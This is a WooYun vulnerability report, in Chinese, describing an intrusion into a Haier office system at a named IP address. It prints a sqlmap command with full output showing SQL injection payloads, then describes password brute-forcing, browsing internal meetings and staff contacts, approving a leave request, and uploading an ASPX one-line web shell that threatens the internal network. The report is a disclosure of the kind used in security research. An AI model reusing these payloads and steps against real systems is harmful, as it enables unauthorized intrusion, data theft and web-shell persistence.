当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0107460

漏洞标题:海尔某项目办公系统getshell(资料泄漏&威胁内网)

相关厂商:海尔集团

漏洞作者: jianFen

提交时间:2015-04-12 21:42

修复时间:2015-04-17 21:44

公开时间:2015-04-17 21:44

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-12: 细节已通知厂商并且等待厂商处理中
2015-04-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

fen

详细说明:

http://123.234.41.55/
用户名存在注入漏洞 但密码随意输入却无法进入系统 应该是分开检测的
它自动读取随机用户名只要密码能和用户名对上就会自动登入 那爆破和猜解就可以了

1.PNG


先看注入 #1

[root@Hacker~]# Sqlmap -u "123.234.41.55" --data "txtName=aaaa"
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutua
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respo
sible for any misuse or damage caused by this program
[*] starting at 12:58:34
[12:58:34] [INFO] parsing HTTP request from '1.txt'
[12:58:35] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requ
sts:
---
Place: POST
Parameter: txtName
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=JhXV2AWIfuIGktA8ofkpb5
PvPwbvt8S7rEEtXXZOl7jS1l7vP1WXzueKa4qzEXloT2HwIEPsngDD1MquUnr6VZ10P/ImR1NHPex07
IwRKniwTnE/TtuZLMqHrnV7ehw6dtzgvNj+z8ldpXPdyd2iE9L/SQmSsvFMF6Y/eCJuw=&__VIEWSTA
EGENERATOR=C2EE9ABB&__EVENTVALIDATION=s4hmTU/mT7FbzKebJAWsxORyZ9Nh1GWPT5/4MJDnT
pTX++/Y4nS+4siOYMZ8tFpcBAwbKga4N9rFcuqdOjZgpFfy7mJguofK49tnbm+QD1a1nHOhnita7Mri
Igbb/za7VB/8M03ZF4aIxqVe9jXDFB9GHAvctojg+8WwHPz5InGL293mf7QqpSQwTQy4X2xDugYuW4x
7EL7NWPQYxGA==&txtName=aaaa%' AND 5875=5875 AND '%'='&txtPwd=aaaaaa&txtCode=krp
&bthLogin.x=64&bthLogin.y=10
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=JhXV2AWIfuIGktA8ofkpb5
PvPwbvt8S7rEEtXXZOl7jS1l7vP1WXzueKa4qzEXloT2HwIEPsngDD1MquUnr6VZ10P/ImR1NHPex07
IwRKniwTnE/TtuZLMqHrnV7ehw6dtzgvNj+z8ldpXPdyd2iE9L/SQmSsvFMF6Y/eCJuw=&__VIEWSTA
EGENERATOR=C2EE9ABB&__EVENTVALIDATION=s4hmTU/mT7FbzKebJAWsxORyZ9Nh1GWPT5/4MJDnT
pTX++/Y4nS+4siOYMZ8tFpcBAwbKga4N9rFcuqdOjZgpFfy7mJguofK49tnbm+QD1a1nHOhnita7Mri
Igbb/za7VB/8M03ZF4aIxqVe9jXDFB9GHAvctojg+8WwHPz5InGL293mf7QqpSQwTQy4X2xDugYuW4x
7EL7NWPQYxGA==&txtName=aaaa%'; WAITFOR DELAY '0:0:5';--&txtPwd=aaaaaa&txtCode=k
pi&bthLogin.x=64&bthLogin.y=10
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=JhXV2AWIfuIGktA8ofkpb5
PvPwbvt8S7rEEtXXZOl7jS1l7vP1WXzueKa4qzEXloT2HwIEPsngDD1MquUnr6VZ10P/ImR1NHPex07
IwRKniwTnE/TtuZLMqHrnV7ehw6dtzgvNj+z8ldpXPdyd2iE9L/SQmSsvFMF6Y/eCJuw=&__VIEWSTA
EGENERATOR=C2EE9ABB&__EVENTVALIDATION=s4hmTU/mT7FbzKebJAWsxORyZ9Nh1GWPT5/4MJDnT
pTX++/Y4nS+4siOYMZ8tFpcBAwbKga4N9rFcuqdOjZgpFfy7mJguofK49tnbm+QD1a1nHOhnita7Mri
Igbb/za7VB/8M03ZF4aIxqVe9jXDFB9GHAvctojg+8WwHPz5InGL293mf7QqpSQwTQy4X2xDugYuW4x
7EL7NWPQYxGA==&txtName=aaaa%' WAITFOR DELAY '0:0:5'--&txtPwd=aaaaaa&txtCode=krp
&bthLogin.x=64&bthLogin.y=10
---
[12:58:35] [INFO] testing MySQL
[12:58:35] [WARNING] the back-end DBMS is not MySQL
[12:58:35] [INFO] testing Oracle
[12:58:35] [WARNING] the back-end DBMS is not Oracle
[12:58:35] [INFO] testing PostgreSQL
[12:58:35] [WARNING] the back-end DBMS is not PostgreSQL
[12:58:35] [INFO] testing Microsoft SQL Server
[12:58:36] [INFO] confirming Microsoft SQL Server
[12:58:37] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2000
[12:58:37] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 2 times
[12:58:37] [WARNING] cannot properly display Unicode characters inside Windows
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances w
ll result in replacement with '?' character. Please, find proper character repr
sentation inside corresponding output files.
[12:58:37] [INFO] fetched data logged to text files under 'F:\1937CN~1\VStart50
tools\????\SQLMAP~2\Bin\output\123.234.41.55'
[*] shutting down at 12:58:37
[root@Hacker~]# Sqlmap


存在注入
#2 爆破密码

4.PNG


登入系统后看看 权限这是一个后来爆破的高权限账号
同意请假 哈

3.PNG


各种内部会议 技术 核心 资料

5.PNG


内部人员联系方式

2.PNG


#3 getshell
我的工作计划 创建后可回复
任意文件上传 asp 杀 aspx 反而不杀

6.PNG


一句话

7.PNG


威胁内网 2008服务器就不搞了 - -

8.PNG


漏洞证明:

7.PNG


8.PNG

修复方案:

后台sql注入 以及用户 所使用的弱口令

版权声明:转载请注明来源 jianFen@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-04-17 21:44

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论